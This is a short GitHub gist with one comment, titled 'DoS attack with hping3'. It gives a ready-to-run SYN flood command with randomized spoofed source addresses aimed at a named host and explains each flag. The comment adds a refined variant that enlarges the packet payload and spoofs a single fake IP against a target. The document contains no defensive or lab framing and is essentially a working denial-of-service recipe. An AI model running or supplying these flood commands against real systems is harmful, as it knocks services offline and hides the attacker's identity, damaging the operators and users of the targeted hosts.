Skip to content

Instantly share code, notes, and snippets.

@davidlares
Created June 17, 2021 03:01
Show Gist options
  • Save davidlares/0c2109b448302b8adecb837923cb1cc7 to your computer and use it in GitHub Desktop.
Save davidlares/0c2109b448302b8adecb837923cb1cc7 to your computer and use it in GitHub Desktop.
DoS attack with hping3

DoS Attack with Hping3

Run the command: hping3 --flood -S -V --rand-source http://stv.com

Where:

  1. --flood send packets as fast as possible
  2. -S (Syn packet): legit TCP packet connection
  3. -V verbose mode
  4. --rand-source randomize the IP source address, like it's requested from different systems (sort of DDoS)
@clhore
Copy link

clhore commented Jan 31, 2022

In this case the '-V' parameter is not really necessary since adding the '--flood' parameter disables it.

hping3: hping in flood mode, no replies will be shown

You can add the parameter '-d' or '--data' to be able to modify the weight of the sent data.
And if you wanted to use a single fake IP instead of multiple ones, you could use '-a' or '--spoof'.

Ej:

sudo hping3 --flood -S -d 2000 -a <fake_ip> <target_ip>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment